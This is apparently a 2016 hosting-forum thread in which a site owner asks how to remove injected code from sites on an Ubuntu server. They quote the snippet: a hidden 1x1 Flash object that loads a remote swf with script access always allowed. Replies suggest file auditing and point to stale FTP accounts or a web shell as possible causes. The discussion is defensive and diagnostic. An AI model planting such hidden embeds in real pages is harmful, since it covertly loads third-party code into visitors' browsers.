XSS Injection on my sites hosted with Ubuntu 14.04 x64 server

January 13, 2016 1.2k views
Security Nginx Ubuntu


I have few sites hosted with Ubuntu 14.04 x64 on DigitalOcean,
and this sites have injected code like this:

<div id="qjlljnppwyng" style="position: absolute; top: 0px; left: 0px; width: 1px; height: 1px; z-index: 2147483647;">
<object type="application/x-shockwave-flash" id="_GPL_e6a00_swf" data="http://cdncache-a.akamaihd.net/items/e6a00/storage.swf?r=1" width="1" height="1">
<param name="wmode" value="transparent">
<param name="allowscriptaccess" value="always">
<param name="flashvars" value="logfn=_GPL.items.e6a00.log&amp;onload=_GPL.items.e6a00.onload&amp;onerror=_GPL.items.e6a00.onerror&amp;LSOName=gpl">

How I can fix it without reinstalling server? Maybe someone had the same problem?

  • If you removed the infected code, does it come back later? You may want to set up auditd to watch those files for changes and when/if they do change again, you can see what process/program has made the change.

    I've had a similar issue with a friend's website. It turns out one of the old FTP accounts (not in use anymore) was injecting the code and once the FTP account was disabled the issue stopped coming up.

    If it turns out the injection/change is being made by Apache itself (or the user if you're using modsuexec or modsuphp) then the website may have a php (or other) shell present or another vulnerability.

  • Infected code is gone, seems like it was generated on the client side.
    In website sources there is no infected code what was posted above.

Be the first one to answer this question.